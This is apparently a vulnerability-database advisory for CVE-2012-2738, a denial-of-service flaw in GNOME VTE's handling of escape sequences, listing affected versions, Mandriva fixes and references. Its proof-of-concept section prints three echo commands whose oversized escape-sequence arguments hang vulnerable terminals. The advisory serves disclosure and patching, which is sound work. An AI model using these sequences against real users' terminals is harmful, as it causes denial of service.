VTE Remote Escape Sequences CVE-2012-2738 Denial of Service Vulnerability
BID:54281
Info
VTE Remote Escape Sequences CVE-2012-2738 Denial of Service Vulnerability
| Bugtraq ID: | 54281 |
| Class: | Design Error |
| CVE: |
CVE-2012-2738 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 03 2012 12:00AM |
| Updated: | Apr 13 2015 09:13PM |
| Credit: | Kevin Fenzi from Red Hat Security Response Team |
| Vulnerable: |
Mandriva Business Server 1 X86 64 Mandriva Business Server 1 GNOME vte 0.28.2-6.fc17 GNOME vte 0.28.2-6.fc16 Gentoo Linux |
| Not Vulnerable: |
GNOME vte 0.32.2 |
Discussion
VTE Remote Escape Sequences CVE-2012-2738 Denial of Service Vulnerability
VTE is prone to a vulnerability that may allow attackers to cause an affected application to consume excessive amounts of memory and CPU time, resulting in a denial-of-service condition.
VTE is prone to a vulnerability that may allow attackers to cause an affected application to consume excessive amounts of memory and CPU time, resulting in a denial-of-service condition.
Exploit / POC
VTE Remote Escape Sequences CVE-2012-2738 Denial of Service Vulnerability
The following example data is available:
echo -en "\e[2147483647L"
echo -en "\e[2147483647M"
echo -en "\e[2147483647P"
The following example data is available:
echo -en "\e[2147483647L"
echo -en "\e[2147483647M"
echo -en "\e[2147483647P"
Solution / Fix
VTE Remote Escape Sequences CVE-2012-2738 Denial of Service Vulnerability
Solution:
Updates are available. Please see the references for more information.
Mandriva Business Server 1 X86 64
Solution:
Updates are available. Please see the references for more information.
Mandriva Business Server 1 X86 64
-
Mandriva lib64vte-devel-0.28.2-5.1.mbs1.x86_64.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva lib64vte-gir0.0-0.28.2-5.1.mbs1.x86_64.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva lib64vte9-0.28.2-5.1.mbs1.x86_64.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva python-vte-0.28.2-5.1.mbs1.x86_64.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva vte-0.28.2-5.1.mbs1.x86_64.rpm
http://www.mandriva.com/en/downloads/
References
VTE Remote Escape Sequences CVE-2012-2738 Denial of Service Vulnerability
References:
References:
- Bug 676090 - malicious escape sequences can cause denial of ser (GNOME)
- Bug 832356 - (CVE-2012-2738) CVE-2012-2738 vte: DoS (long loop) via escape seque (Red Hat Bugzilla)
- Bug 832357 - vte: DoS (long loop) via escape sequences with l (Red Hat Bugzilla)
- emulation: Limit integer arguments to 65535 (GNOME)